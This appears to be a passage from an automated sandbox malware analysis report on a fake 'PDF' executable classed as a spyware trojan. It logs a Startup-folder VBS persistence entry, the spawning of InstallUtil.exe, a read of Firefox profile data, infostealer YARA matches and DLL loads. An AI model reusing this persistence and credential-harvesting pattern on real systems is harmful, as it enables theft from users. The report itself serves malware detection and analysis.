                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015AED985_2_015AED98
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015AD6585_2_015AD658
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A95485_2_015A9548
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A95385_2_015A9538
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A9B505_2_015A9B50
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A9B495_2_015A9B49
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_0769E3B05_2_0769E3B0
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076800405_2_07680040
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076800065_2_07680006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FE93386_2_00FE9338
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FE9AE86_2_00FE9AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FE4A486_2_00FE4A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FECD606_2_00FECD60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FE3E306_2_00FE3E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00FE41786_2_00FE4178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E197086_2_05E19708
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E126F86_2_05E126F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E189906_2_05E18990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E1D8606_2_05E1D860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E100406_2_05E10040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E13B686_2_05E13B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E152F86_2_05E152F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E14C186_2_05E14C18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E12E606_2_05E12E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E1B9206_2_05E1B920
                      Source: rScan_0984829339_PDF.exeBinary or memory string: OriginalFilename vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYsnufioez.dll" vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2283852464.0000000006580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYsnufioez.dll" vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2285672157.00000000072C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000000.2162742766.0000000000942000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2260543550.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exeBinary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                      Source: rScan_0984829339_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: rScan_0984829339_PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: rScan_0984829339_PDF.exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile read: C:\Users\user\Desktop\rScan_0984829339_PDF.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\rScan_0984829339_PDF.exe "C:\Users\user\Desktop\rScan_0984829339_PDF.exe"
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Guid.exe "C:\Users\user\AppData\Roaming\Guid.exe"
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Guid.exe "C:\Users\user\AppData\Roaming\Guid.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: sspicli.dllJump to behavior
